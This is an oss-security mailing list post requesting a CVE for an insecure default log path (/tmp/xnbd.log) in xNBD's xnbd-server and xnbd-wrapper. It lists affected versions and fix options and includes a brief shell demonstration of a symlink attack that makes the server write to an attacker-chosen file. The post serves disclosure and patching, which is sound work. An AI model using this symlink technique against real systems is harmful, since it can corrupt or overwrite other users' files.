Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 06 Feb 2013 17:48:59 +0100
From: Sebastian Pipping <>
Subject: CVE request: Insecure default log file path in xNBD

Hello oss-security!

Target software

xNBD upstream

Official Debian packages


xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log
for logging when parameter --daemonize (and no --logpath FILE) is given.

The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so there
is a vulnerability against symlinks attacks.


Here is an exploitation example:

   $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log

   $ touch DISK
   $ truncate --size=$((100*1024**2)) DISK

   $ /usr/sbin/xnbd-server --daemonize --target DISK
   xnbd-server(12462) msg: daemonize enabled
   xnbd-server(12462) msg: cmd target mode
   xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
   xnbd-server(12462) msg: xnbd master initialization done
   xnbd-server(12462) msg: logfile /tmp/xnbd.log

   $ ls -l ~/ATTACK_TARGET
   -rw------- 1 user123 user123 653 Feb  1 16:41 \

Affected versions

The latest code in the upstream Mercurial repository is not affected
since it does not use logging to /tmp/xnbd.log (or any default
location) any more.

   Version                        Status
   0.0.x                          not analyzed
   0.1.0-pre                      VULNERABLE (xnbd-server only)
   0.1.0-pre-hg20-e75b93a47722-2  VULNERABLE (xnbd-server and -wrapper)
   Mercurial tip                  not vulnerable

Options for a fix

  a) Use syslog with --daemonize and no default file location in general
     (i.e. what upstream did)

  b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log
     for the hard-coded defaults

  c) Replace flag O_APPEND by O_EXCL  (secure but reducing functionality)

The attached patch applies approach (b) to version 



View attachment "xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch" of type "text/x-patch" (6162 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.